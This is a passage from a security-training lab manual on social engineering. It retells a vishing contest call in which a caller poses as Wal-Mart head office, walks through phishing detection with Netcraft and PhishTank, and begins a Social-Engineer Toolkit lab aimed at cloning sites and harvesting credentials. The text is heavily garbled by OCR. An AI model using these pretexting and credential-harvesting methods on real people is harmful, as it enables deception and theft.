CEH Lab Manual

Social Engineering
Module 09


Module 09 - Social Engineering

Social Engineering
Social engineering is the art of convincingpeople to reveal confidential infonmtion.
I CON KEY
/ Valuable
information
^

Test your

Lab Scenario
Source: http:/ / m onev.cnn.com /2012 /0 8 /O‫־־‬/technology/walm art-hackde Icon/index.litni
Social engineering is essentially the art o f gaining access to buildings, systems,
data by exploiting human psychology, rather than by breaking 111 01‫ ־‬using
technical hacking techniques. The term “social engineering” can also mean an
attem pt to gain access to information, primarily through misrepresentation, and
often relies 011 the trusting nature o f m ost individuals. For example, instead o f
trying to find software vulnerability, a social engineer might call an employee
and pose as an IT support person, trying to tiick the employee into divulging
111s password.
01‫־‬

*5 Web exercise
£ Q Workbook revie

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee
into giving 111111 inform ation that could be used 111 a hacker attack to win a
coveted “black badge” 111 the “social engineering” contest at the D eleon
hackers’ conference 111 Las Vegas.
111 tins year's Capture the Flag social engineering contest at D eleon, champion
Shane MacDougall used lying, a lucrative (albeit bogus) government contract,
and 111s talent for self-effacing small talk to squeeze the following inform ation
out o f Wal-Mart:
■

The small-town Canadian Wal-Mart store's janitorial contractor

■

Its cafeteria food-seivices provider

■ Its employee pay cycle
■ Its staff sliilt schedule
■

The time managers take then‫ ־‬breaks

■ W here they usually go for lunch
■ Type o f PC used by the manager
■ Make and version numbers o f the computer's operating system, and
■

Its web browser and antivirus software


Stacy Cowley at CNNM oney wrote up the details o f how Wal-Mart got taken
to the extent o f coughing up so m uch scam-worthy treasure.

111

Calling from 111s sound-proofed booth at D eleon MacDougall placed an
“urgent” call, broadcast to the entire D eleon audience, to a Wal-Mart store
manager 111 Canada, introducing liiinsell as "G an‫ ־‬Darnell" from Wal-Mart's
hom e oflice 111 Bentonville, Ark.

C E H L ab M an u al Page 675

E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

The role-playing visher (visliing being phone-based phishing) told the manager
that Wal-Mart was looking at the possibility o f winning a multimillion-dollar
government contract.
“Darnell'’ said that 111s job was to visit a few Wal-Mart stores that had been
chosen as potential pilot locations.
But first, he told the store manager, he needed a thorough picture o f how the
store operated.
111 the conversation, which lasted about 10 minutes, “Darnell” described
himself as a newly lured manager o f government logistics.
He also spoke offhand about the contract: “All I know is Wal-Mart can make a
ton o f cash o ff it,” he said, then went on to talk about his upcom ing visit,
keeping up a “ steady patter” about the project and life 111 Bentonville, Crowley

writes.
As if tins wasn't bad enough, M acDougall/Darnell directed the manager to an
external site to fill out a survey 111 preparation for 111s upcom ing visit.
The compliant manager obliged, plugging the address into 111s browser.
W hen his com puter blocked the connection, MacDougall didn't miss a beat,
telling the manager that he'd call the IT departm ent and get the site unlocked.
After ending the call, stepping out o f the booth and accepting 111s well-earned
applause, MacDougall became the first Capture the Flag champion to capture
even‫ ״‬data point, or flag, on the competition checklist 111 the three years it has
been held at Defcon. D efcon gives contestants two weeks to research their
targets. Touchy inform ation such as social security numbers and credit card
num bers are verboten, given that D efcon has no great desire to bring the law
down on its head.
D efcon also keeps its nose clean by abstaining from recording the calls, which
is against Nevada law. However, there's no law against broadcasting calls live to
an audience, which makes it legal for the D efcon audience to have listened as
]MacDougall pulled down Wal-Mart's pants.
MacDougall said, “Companies are way more aware about their security. They’ve
got firewalls, intrusion detection, log-in systems going into place, so it’s a lot
harder for a hacker to break 111 these days, or to at least break in undetected. So
a bunch o f hackers now are going to the weakest link, and the link that
companies just aren’t protecting, which is the people.”\
MacDougall also shared few best practices to be followed to avoid falling victim
to a social engineer:

C E H L ab M an u al Page 676

■

Never be afraid to say no. If something feels wrong, something is

wrong

■

A 11 IT departm ent should never be calling asking about operating
systems, machines, passwords or email systems— they already know

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

■

Set up an internal company security word o f the day and don’t give any
information to anyone who doesn’t know it

■

Keep tabs 011 w hat’s 011 the web. Companies inadvertently release tons
o f inform ation online, including through employees’ social media sites

As an expert eth ical hacker and penetration tester, you should circulate the
best practices to be followed among the employees.
& T o o ls
dem onstrated in
this lab are
available in
D:\CEHTools\CEHv8

Module 09 Social
Engineering

Lab Objectives
The objective o f this lab is to:
■

D etect phishing sites

■

Protect the network from phishing attacks

To earn* out tins lab, you need:
■

A computer mmnng Window Seiver 2012

■

A web browser with Internet access

Lab Duration
Time: 20 Minutes
» TASK 1
Overview

Overview Social Engineering
Social engineering is die art of convincing people to reveal confidential information.
Social engineers depend 011 the fact that people are aware of certain valuable

information and are careless 111 protecting it.

Lab Tasks
Recommended labs to assist you 111 social engineering:
■

Social engineering

■

Detecting plushing using Netcraft

■

Detecting phishing using PliishTank

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion
your target’s security posture and exposure.

011

P L E A S E TALK T O Y OU R I N S T R U C T O R IF YOU HAV E Q U E S T I O N S
R E L A T E D T O T H I S L AB .

C E H L ab M an u al Page 677

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]



Module 09 - Social Engineering

Delecting Phishing Using Netcraft
Netrmftprovides n‫׳‬eb server and n‫׳‬eb hosting warket-share analysis, including n'eb
server and operating system detection.
I CON KEY
Valuable /
information
.‫״*־‬v Test your

*a Web exercise
ffi! Workbook revi!

Lab Scenario
By now you are familiar with how social engineering is perform ed and what sort
ot inform ation can be gathered by a social engineer.
Phishing is an example o f a social engineering technique used to deceive users,
and it exploits the poor usability o f current web security technologies.
Phishing is the act o f attempting to acquire information such as user names,
passwords, and credit card details (and sometimes, indirectly, money) by
masquerading as a trustworthy entity in an electronic communication.
Communications claiming to be from popular social websites, auction sites,
online payment processors, 01‫ ־‬IT administrators are commonly used to lure the
unsuspecting public. Phishing emails may contain links to websites that are
infected with malware. Phishing is typically carried out by email spoofing 01‫־‬
instant messaging and it often directs users to enter details at a fake website
whose look and feel is almost identical to the legitimate one.
Phishers are targeting the customers o f banks and online payment services.
They send messages to the bank customers by manipulating URLs and website

forger\T. The messages sent claim to be from a bank and they look legitimate;
users, not realizing that it is a fake website, provide their personal information
and bank details. N o t all phishing attacks require a fake website; messages that
claim to be from a bank tell users to dial a phone num ber regarding problems
with their bank accounts. Once the phone num ber (owned by the plusher, and
provided by a Voice over IP service) is dialed, it prom pts users to enter their
account numbers and PIN. Vishing (voice phishing) sometimes uses fake callerID data to give the appearance that calls come from a trusted organization.
Since you are an expert eth ical hacker and penetration tester, you m ust be
aware o f phishing attacks occurring 011 the network and implement antiphishing measures. 111 an organization, proper training must be provided to
people to deal with phishing attacks. 111 this lab you will be learning to detect
phishing using Netcraft.

C E H L ab M an u al Page 678

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

Lab Objectives
T in s k b w ill sh o w y o u p h ish in g sites u sin g a w e b b ro w s e r a n d sh o w y o u h o w to
use th e m . I t w ill te a c h y o u h o w to:
■

D e te c t p h ish in g sites

■

P ro te c t th e n e tw o rk fro m p h ish in g attack


T o carry o u t tins lab y o u need:

^ ~ T o o ls

dem onstrated in
this lab are
available in
D:\CEHTools\CEHv8
Module 09 Social
Engineering

■

N etcraft is lo c a te d at D:\CEH-Tools\CEHv8 Module 09 Social
Engineering\Anti-Phishing Toolbar\Netcraft Toolbar

■

Y o u can also d o w n lo a d th e la test v e rsio n o f Netcraft Toolbar fro m th e
link h t t p : / /to o lb a r .n e tc r a lt.c o m /

■

I f y o u d ecid e to d o w n lo a d th e la te st version, th e n sc re e n sh o ts sh o w n
111 th e lab m ig h t d iffer

■

A c o m p u te r ru n n in g W in d o w s S erv er 2012


■

A w e b b ro w se r (F irefox, I n te r n e t ex p lo rer, etc.) w ith In te rn e t access

■

A d m in istra tiv e privileges to r u n th e N e tc r a lt to o lb a r

Lab Duration
Tim e: 10 M inutes

Overview of N etcraft Toolbar
N etc raft T o o lb a r provides Internet security services, including anti-fraud an d
anti-phishing services, application testing, code reviews, au to m ated p en etratio n
testing, and research data and analysis o n m an y aspects o f the Internet.

Lab Tasks
^

T A S K

1

Anti-Phishing Tool
bar

C E H L ab M an u al Page 679

1.


T o sta rt th is lab, y o u n e e d to la u n c h a w eb b ro w s e r first. 111 this lab w e
hav e u se d Mozilla Firefox.

2.

L a u n c h th e Start m e n u by h o v e rin g th e m o u se c u rso r o n th e lo w er-left
c o rn e r o f th e d esk to p .

E th ical H a ck in g a nd C ountem ieasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

JL

5

‫״‬

Q = J Y o u cau also
download the Netcraft
toolbar form
h ttp ://toolbar.netcraft.com

* | Windows Server 2012
Wiwfciwo “erfci2012 IUIc.m C1n4llMI( Dot*c«nV
tiftlaatoncopv BmO MW


FIGU RE 1.1: Windows Server 2012-Start Menu

3.

Click th e Mozilla Firefox ap p to la u n c h th e b ro w ser.

FIGU RE 1.2: Windows Server 2012-Start Menu Apps view

N etcraft provides
Internet security services,
including anti-fraud and
anti-phishing services.

4.

T o d o w n lo a d th e Netcraft Toolbar fo r Mozilla Firefox, e n te r
h t t p : / / to o lb a r.n e tc ra ft.c o m in th e ad d re ss b a r o f th e b ro w s e r o r d rag
a n d d ro p th e netcraft_toolbar-1.7-fx.xpi file in F irefo x .

5.

111 tins lab, w e are d o w n lo a d in g th e to o lb a r Iro m th e In te rn e t.

6.

111 F ire fo x b ro w ser, click Download th e N etcraft Toolbar to install as
th e ad d -o n .
^

‫ןזח‬


‫ת‬

etc M i ft

SINGLEH3 P

■‫ ן‬n

, ,

M»tc‫׳‬-»ft Toolbar

‫• ■׳‬

Why u tt tn• Noicratt Toolbar?
U Protect your tavinQf Irom I'hMhtnq attack*,
a s«« the hoittnq totat)or1and Ukfc Matatq 01«‫י‬
O I1*lp defend 11*0 Internet community trooi tra

FIGURE 1.3: Netcraft toolbar downloading Page

C E H L ab M anual Page 680

E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering


7.

O n th e Install pag e o f th e N e tc ra ft T o o lb a r site, click th e Firefox
im age to c o n tin u e w ith in stallatio n .
fc 4

c

P

‫ ־ » ״‬,.(■.

ftO l

1

nETCI^AFT

D o w n lo a d N ow
Netcraft Anti Phithing Toolbar

&

CQQ1 Netcraft is an
Internet services company
based in Bath, England.

System Raqiilramania

FIGU RE 1.4: N etcraft toolbar Installation Page


8.

Click Allow to d o w n lo a d N e tc ra ft T o o lb a r.
^

at ■
10c*«.ne
‫«סי»*ז‬

1 -‫־‬Hctcraft Teotbir

SNGLEH2r

■1

D o w n lo a d N ow
N*te«H Antl-PN«hl0<‫ ׳‬Todhtr

r=rs

a

Systam Kaquirtrranti

'oolba•
>r>a*pl«tfc#rre (AMnn/HMnji)
«

cwitnnrva>« .*‫׳‬sicns orthe too&ar 1«r

or«e

roujrg ««> « tu w « oo«‫׳‬a. and Mian

Help & Support
roMom• inat«llinQ?fm • ••id at#1..I.II.1.‫«״־‬mU.
« also ha»» a 8»t«t1«n 0»tutofwis
FIGU RE 1.5: Netcraft toolbar Installation-Allow button

9.

W h e n th e Softw are Installation d ialo g b o x ap p ears, click Install Now.
Software Installation
Install add-ons only from authors whom you trust.
Malicious software can damage your computer or violate your privacy.

You have asked to install the following item:
Netcraft Anti-Phishing Toolbar (Netcraft Ltd)

£ Q Netcraft Toolbar
provides a wealth o f
information about the sites
you visit.

/>
Install N o w

Cancel

FIGU RE 1.6: Installing Netcraft Toolbar

10. T o c o m p le te th e in stallatio n it w ill ask y o u to re sta rt th e b ro w ser. C lick

Restart Now.

C E H L ab M anual P ag e 681

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

l.__ Risk Rating displays die
trustworthiness o f die current

■ A• Help & Support
• l*1gUHnImlnilMiuf 1‫׳‬
lr«m*■■•I UJ4InilaMu• *Mr
‫ י‬Ao jlec h1v« jMlaclKMx/ iito ijit tf you • i t «0 with* non • o«t 1Oimmh'it >n(juMOtm

FIGU RE 1.7: Restarting Firefox browser

11. N etcraft Toolbar is n o w visible. O n c e th e Toolbar is in stalled , it lo o k s
sim ilar to th e fo llo w in g figure.
p

\U----

>«rw •t

font

Hill•

1

*

‫ם‬-

J

FIGU RE 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. W h e n y o u visit a site, th e fo llo w in g in fo rm a tio n displays 111 th e T o o lb a r
(unless th e pag e h as b e e n b lo ck ed ): Risk rating, Rank, a n d Flag.
13. Click S ite Report to sh o w th e r e p o rt o f th e site.

0=5!Site report links to :
detailed report for die

FIGU RE 1.9: Report generated by N etcraft Toolbar

14. I f y o u a tte m p t to visit a p ag e th a t h as b e e n id e n tified as a p liish in g page
by N e tc ra ft T o o lb a r y o u w ill see a warning dialog th a t lo o k s sim ilar to
th e o n e in th e fo llo w in g figure.
15. T ype, as an exam ple:
h ttp : / / w w w .pavpal.ca.6551 .secu re7 c.m x / im ages / cgi.bin

C E H L ab M anual Page 682

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

£ 0 . Phishing a site feeds
0011011x1011517updated
encrypted database of
patterns diat match phishing
URLs reported by the
Netcraft Toolbar.

FIGU RE 1.10: Warning dialog for blocked site

16. I f y o u tru st th a t p ag e click Y es to o p e n it a n d i f y o u d o n ’t, click No
(R ecom m ended) to b lo c k th a t page.
17. I f y o u click No th e fo llo w in g p ag e w ill be displayed.
c

.!■!•!!‫■!ר‬

Coofb

fi ft

C-

PhKMng S*o Hlockcxl

%lll t‫»־־‬

.......- : m ;

.

L

■

FIGURE 1.11: Web page blocked by Netcraft Toolbar

Lab Analysis
D o c u m e n t all die results an d rep o rt g athered d uring die lab.
T o o l/U tility
N e tc r a f t

I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d
■

P h ish in g site d e te c te d

P LEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S
RE L A T E D TO T H I S LAB.

Questions
1.

C E H L ab M anual Page 683

E v alu ate w h e th e r th e N e tc ra ft T o o lb a r w o rk s i f y o u use a tra n sp a re n t
proxy.
E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

2.

D e te rm in e it y o u can m ake th e N e tc ra ft T o o lb a r co e x ist o n th e sam e
line as o th e r to o lb a rs. I f so, h o w ?

3.

H o w ca n y o u sto p th e T o o lb a r w a rn in g if a site is tru ste d ?

I n t e r n e t C o n n e c t io n R e q u ir e d
□ N<
P la tf o r m S u p p o r te d
0 C la s s r o o m

C E H L ab M an u al Page 684

□ !Labs

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

3
Detecting Phishing Using
PhishTank
PhishTank is a collaborative clearinghousefor data and information regarding
phishing on the Internet.
I C O N

K E Y

Valuable
____information
.‫ *>־‬Test your
gfe Web exercise
Workbook r‫׳‬e‫\־‬

Lab Scenario
P h ish in g is an a tte m p t b y an in d iv id u al 01‫ ־‬g ro u p to solicit p e rso n a l in fo rm a tio n
fro m u n su sp e c tin g u sers by em p lo y in g social en g in eerin g te ch n iq u es. P h ish in g
em ails are cra fte d to a p p e a r as if th ey h av e b ee n se n t fro m a legitim ate

o rg an iz atio n 01‫ ־‬k n o w n individual. T h e se em ails o fte n a tte m p t to en tice u sers to
click 011 a link th a t will take th e u se r to a fra u d u le n t w eb site th a t ap p ears
legitim ate. H ie u se r th e n m ay b e ask ed to p ro v id e p e rso n a l in fo rm a tio n su c h as
a c c o u n t u se r n am es a n d p a ssw o rd s th a t can fu rth e r ex p o se th e m to fu tu re
co m p ro m ises. A dditio n ally , th e se fra u d u le n t w eb sites m ay c o n ta in m alicious
code.
W ith th e tre m e n d o u s in c re ase 111 th e u se o f o n lin e b an k in g , o n lin e share trad in g ,
a n d e c o m m e rc e, th e re h as b e e n a c o rre sp o n d in g g ro w th 111 th e in c id en ts o f
p h ish in g b ein g u se d to carry o u t financial trau d s. P h isliin g in v o lv es fra u d u len tly
acq u irin g sensitive in fo rm a tio n (e.g. p assw o rd s, cre d it c a rd details etc.) b y
m a sq u erad in g as a m asted entity.
111 th e p rev io u s lab y o u h av e already seen h o w a p h ish in g site can b e d e te c te d
u sin g th e N e tc ra ft tool.

T h e u sual scen ario is th a t th e v ic tim receives an em ail th a t ap p e ars to h av e b ee n
se n t fro m 111s bank. T h e em ail u rg es th e v ictim to click 011 th e lin k 111 th e em ail.
W h e n th e v ic tim d o es so, h e is ta k en to “ a secu re p ag e 011 th e b a n k ’s w e b site .”
T h e v ic tim believes th e w e b pag e to b e a u th en tic a n d h e e n te rs 111s u se r n am e,
p a ssw o rd , a n d o th e r in fo rm a tio n . 111 reality, th e w e b site is a fake a n d th e
v ic tim ’s in fo rm a tio n is sto len a n d m isused.
B eing an ad m in istra to r 01‫ ־‬p e n e tra tio n tester, y o u m ig h t im p le m e n t all th e m o st
so p h istica te d a n d ex p en siv e te c h n o lo g y so lu tio n s 111 th e w o rld ; all o l it can be
byp assed i f y o u r em p lo y ees fall fo r sim ple social en g in ee rin g scam s. I t b ec o m e

C E H L ab M an u al Page 685

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

y o u r resp o n sib ility to e d u c ate em p lo y ees 011 b e st p ractices fo r p ro te c tin g
in fo rm a tio n .
P h ish in g sites 01‫ ־‬em ails can b e re p o rte d to p lu sl 11n g -re p o rt@ u s-c e rt.g o v
h ttp : / / w w w .u s-c e rt.g o v / 11a v /r e p o r t p h 1sh 111g .h tm l
U S -C E R T (U n ited S tates C o m p u te r E m e rg e n c y R ead in ess T eam ) is co llectin g
p h ish in g em ail m essages a n d w eb site lo c atio n s so th a t th e y can h elp p eo p le
av o id b e c o m in g v ic tim s o f p h ish in g scam s.

[CTTools
dem onstrated in
this lab are
available in
D:\CEHTools\CEHv8
Module 09 Social
Engineering

Lab Objectives
T h is lab w ill sh o w y o u h o w to use p h ish in g sites u sin g a w e b b ro w ser. I t w ill
teach y o u h o w to:
■

D e te c t p h ish in g sites

■

P ro te c t th e n e tw o rk fro m p h ish in g attacks

Lab Environment

T o carry o u t th e lab y o u need:
■ A c o m p u te r ru n n in g W in d o w s S erver 2012
■ A w eb b ro w se r (F irefox, In te rn e t E x p lo re r, etc.) w ith In te rn e t access

Lab Duration
T une: 10 M inutes

Overview of PhiskTank
£ Q PhishTank URL:
h ttp .//www.phishtank.com

P h ish T an k is a free community site w h ere anyone can subm it, verify, track,
s!1are phishing data. P h ish T an k is a collaborative clearing h o u se for data

and
and

inform ation regarding phish in g 011 the Internet. A lso, P h ish T an k provides an open
API to r developers an d researchers to integrate anti-phishing data into their
applications at 110 charge.

Lab Tasks
m.

T A S K

1

1.

T o sta rt th is lab y o u n e e d to la u n ch a w eb b ro w se r first. 111 th is lab w e
hav e u se d Mozilla Firefox.

2.

L a u n c h th e Start m e n u b y h o v e rin g th e m o u se c u rso r 011 th e lo w er-left
c o rn e r o f d esk to p .

PhishTank

C E H L ab M an u al Page 686

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

jw
$

23 Windows Server 2012
Wndowa icrrct 2012 IUIe.m C«>vl!uatr D*t*cn»
b
- g • *fa

FIGU RE 2.1: Windows Server 2012-Start Menu

3.

Click th e Mozilla Firefox ap p to la u n c h th e b ro w ser.

£ 0 1 PlushTank provides an
open API for developers and
researchers to integrate antiphishing data into dieir
applications at no charge.

FIGU RE 2.2: Windows Server 2012-Start Menu Apps view

4.

T y p e http://w w w.phishtank.com in th e ad d ress b a r o f th e w e b b ro w s e r
a n d p ress Enter.

5.

Y o u w ill see th e follow/ing

PhishTank ‫־‬.,‫״‬.‫י‬.,
J o in t i e fiy lita y a iittt p liia liiiK j
Sdbmrtstsopdfdohshes Track the Uatis of /a ir suhmfyaons
Verfy
Recert Subrissbrs
1S7:£S1

rtnJ «r»n

rmjmagei/

^*®:/VrstM.axVsy
lgliia

rtc usemncs.aebfu.ictscmnsraurAxroim
m.cvn’PM/iMlct.Kni

FIGU RE 2.3: Welcome screen o f PhishTank

C E H L ab M anual Page 687

E th ical H a ck in g a nd C ountem ieasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

PliishTauk 1s operated
by O pen D N S to improve
the Internet through safer,
faster, and smarter DNS.

6.

T y p e th e w e b site URL to b e c h e ck e d fo r p h ish in g , fo r ex am p le,
h ttp : / / s d a p ld 2 1 .h o s t2 1.c o m .

7.

C lick Is it a phish?.

Join the fight against phishing
Submrt tu w c » d pheftea. ‫־‬Rack the ttatic of 1/cur submissions
Verfyongf jserV suonssons Develop software wtthourftee API.
j ntp //Kijptav. itMtucem
R#c*r» SubriKtors

*MhTinkprovttet »‫ ׳‬oh‫ ״‬An tar

■dim)feat)lu>miftHim »u»p«>-le0pirn

'wcpcfcetMlr-drccint‫יי״׳‬Tfl-34CTdY..

FIGU RE 2.4: Checking for site

I f th e site is a phishing site , y o u see th e fo llo w in g w a rn in g d ialo g b ox.

PhishTank

Ok of it* NM.i«o*MTw*

Submission #1571567 is aimentty ONLINE

02

O pen D N S is
interested in having die
best available information
about phishing websites.

S01 n or Hcgcto‫ ׳‬to vert, t !6 sutxnsstor.

No screenshot yet
We have net yet successfully taken
a screeasltol •f the submitted website.

FIGURE 2.5: W arning dialog for phishing site

Lab Analysis
D o c u m e n t all die w ebsites an d verify w h eth e r diey are ph ish in g sites.
T o o l/U tility
P h is k T a n k

C E H L ab M anual Page 688

I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d
■

P h ish in g site d e te c te d

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

PLEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S
RE L A T E D TO T H I S LAB.

Questions

1.

E v alu ate w h a t P liisliT an k w a n ts to h e a r a b o u t spam .

2.

D o e s P liisliT an k p r o te c t y o u fro m p h ish in g ?

3.

W h y is O p e n D N S b lo ck in g a p lu sh site th a t P liisliT an k d o e s n 't list o r
has n o t v et v e n tie d ?

I n t e r n e t C o n n e c t io n R e q u ir e d
0 Y es

□ No

P la tf o r m S u p p o r te d
0 C la s s r o o m

C E H L ab M an u al Page 689

□ !Labs

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

3
Social Engineering Penetration
Testing using Social Engineering
Toolkit (SET)
The Socia/-Engineer Toolkit (SE T) is an open-source ‫־‬Python-driven tool aimed at
penetration testing around social engineering

■con

key

£_ Valuable

information
s

Test your
knowledge
Web exercise

m

Workbook review

Lab Scenario
Social en g in eerin g is an ev e r-g ro w in g th re a t to o rg an iz atio n s all o v er th e w o rld .
Social en g in ee rin g attack s are u se d to c o m p ro m ise c o m p a n ie s e v e n ‫ ־‬dav. E v e n
th o u g h th e re are m a n y h ac k in g to o ls available w ith u n d e rg ro u n d h ack in g
c o m m u n itie s, a social en g in eerin g to o lk it is a b o o n fo r attack ers as it is freely

available to u se to p e rfo rm sp e ar-p liish in g attack s, w eb site attack s, etc.
A tta ck e rs ca n d ra ft em ail m essag es a n d a tta c h m alicio u s files an d se n d th e m to
a large n u m b e r o f p e o p le u sin g th e sp e a r-p h ish in g attac k m e th o d . A lso , th e
m u lti-atta ck m e th o d allow s u tiliza tio n o f th e Java ap p let, M e tasp lo it b ro w ser,
C red e n tia l H a r v e s te r / T a b n a b b in g , etc. all a t once.
T h o u g h n u m e ro u s so rts o l attack s can b e p e rfo rm e d u sin g tin s to o lk it, tins is
also a m u st-h a v e to o l fo r a p e n e tra tio n te ste r to ch e ck fo r v u lnerabilities. S E T is
th e sta n d a rd fo r social-en g in eerin g p e n e tra tio n tests a n d is su p p o rte d heavily
w ith in th e security co m m u n ity .
A s an eth ical hacker, p e n e tra tio n tester, o r security adm inistrator, y o u
sh o u ld b e extrem ely fam iliar w ith th e Social E n g n ie e rin g T o o lk it to p e rfo rm
v ario u s tests fo r vulnerab ilities 011 th e n etw o rk .

Lab Objectives
T h e o b jectiv e o f tins lab is to h elp stu d e n ts le arn to:

C E H L ab M an u al Page 690

■

C lo n e a w eb site

■

O b ta in u se r n am es a n d p a ssw o rd s u sin g th e C red e n tia l H a rv e ste r
m e th o d

■

G e n e ra te re p o rts fo r c o n d u c te d p e n e tra tio n tests

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

& Tools
dem onstrated in
this lab are
available in
D:\CEHTools\CEHv8
Module 09 Social
Engineering

Lab Environment
T o earn ’ o u t die k b , y ou need:
■

R u n this tool 111 BackTrack V irtual M aclune

■

W eb b row ser w ith In te rn e t access

■

A dm inistrative privileges to m n tools

Lab Duration
T une: 10 M inutes

Overview of Social Engineering Toolkit
Social-Enguieer T oolkit is an o p en -so u rce P y th o n -d riv en to o l aim ed at p en etratio n
testing aro u n d Social-Engineering. T lie (SET) is specifically designed to p erfo rm
advanced attacks against die h u m a n elem ent. T lie attacks built in to d ie toolkit are
designed to be targeted and focused attacks against a p erso n o r organization used
during a pen etratio n test.

Lab Tasks
T A S K

1

Execute Social
Engineering
Toolkit

1.

L o g in to y o u r BackTrack v irtu a l m aclune.

2.

Select A pplications ‫ ^־־‬BackTrack ‫ ^־־‬Exploitation T ools ‫ ^־־‬Social

Engineering T ools ‫ ^־־‬S ocial Engineering Toolkit a n d click Set.
^ Applications[ Places System [>7]

3

Tue Sep 25. 7:10 PM

|Q ^ Information Gathering
r■ vulnerability Assessment

J0

Exploitation Tools

.-f * Network Exploitanor Tools
Web Exploitation Tools

Privilege Escalation
E f Maintaining Access
^

Reverse Engineering

I

RFID100IS

Database Exploitation Tools ^
Wireless Exploitation Tools
social E’ jifM 9 |

O

Physical

Forensics

Exploitation

‫י‬Open Source E x p lo ite d ,h set \ 3

a
9

9
11•

BEEF XSS Framework

MoneyPots
Social Engineering Toolkit

KCporting Tools
c P services
y

Miscellaneous

►

<< back track

FIGU RE 3.1: Launching SET in BackTrack

C E H L ab M anual P ag e 691

E tliical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

3.

f f i s E T has been
presented at large-scale
conferences including
Blackhat, DerbyCon,
D efcon, and ShmooCon.

A Terminal w in d o w fo r S E T w ill ap p ear. T y p e y an d p ress Enter to
agree to th e term s o f service.
File Edit View Terminal Help
THIS SOFTWARE, EVEN IF ADVISED OF THE PO SSIBILITY OF SUCH

DAMAGE.

The above lic e n s in g was taken from th e BSD lic e n s in g and ^is a p p lie d to S o c ia l-E n
g in e e r T o o lk it as w e l l .
___
" * ^ 1
Note t h a t th e S o c ia l-E n g in e e r T o o lk it i s p ro v id e d as i s , and i s
p en -so urce a p p lic a t io n .
M r

3

r o y a lt y f r e e

0

F e e l f r e e to m o d ify , use, change, m arket, do w h atever § u want w ith i t a f lo n g a
s you g iv e th e a p p ro p r ia te c r e d i t where c r e d i t
i s due (which means g iv in g th e au th o rs th e c r e d i t th e y ife s e rv e f o r w r i t in g i t ) .
A lso n ote t h a t by using t h is s o ftw a re , i f you e v e r
see th e c r e a t o r o f SET in a b a r , you a re re q u ire d to g iv e him a hugand buy
him
a b e e r. Hug must l a s t a t le a s t 5 seconds. Author
holds th e r ig ft t to refipse th e hug o r th e b e e r . ■
f
| ‫ן‬
^
\ \

1

£ Q t 11e web jacking attack
is performed by replacing
the victim’s browser with
another window that is
made to look and appear to
be a legitimate site.

T ^ ^ * c M - E t l^ e e r T A lk it W s r fT iig fliiJ p y e ly
good pn

if l a
op I ^ S a t h * t o o l f o f l rcaj f c j B u ^ p u r J ^ e t h a r ^ r c
n W c r a t h O T f t f l b ^ th e l:o m p a n y *y m j a r e ^ r e r f O T ll™ a ^ e s s « e r r ^
J ‫׳‬ou a re v i o l a t
in g th e term s o f s e r v i e and lic e n s e o f t h i s t o o l s e t . B^ , r t t i n q X
yes (o n ly one t im e ) , you ag ree to th e term s o f s e r v ic e a n d T n a t y o u w i l l o n ly us
e t h i s t o o l f o r la w f u l purposes o n ly .

4

1

\

FIGU RE 3.2: SET Service Agreement option

4.

Y o u w ill b e p re s e n te d w ill a list o f m e n u s to select th e task. T y p e 1 an d
p ress Enter to select th e Social-Engineering A ttacks o p tio n .
File Edit View Terminal Help
Homepage: h ttp s ://w w w .tru s te d s e c .c o m

[

Welcome to th e S o c ia l-E n g in e e r T o o lk i t (S E T J j.Y o u r one
stop shop f o r a l l o f your s o c ia l-e n g in e e r in g n e e d s .^ ,
J o in us on i r c .f r e e n o d e .n e t i n channel # s e « J o lk it
The S o c ia l-E n g in e e r T o o lk it i s a p rodu ct o f Tru sted S ec.

f f i s E T allows you to
specially craft email
messages and send them to
a large (or small) number of
people with attached file
format malicious payloads.

V is it:

h ttp s ://w w w .tru s te d 5 e c .c o m

S e le c t from th e menu:

J 1) Social-Engineering Attacks I

_

2) F a s t-T ra c k P e & t r a t i o n T e s tin g
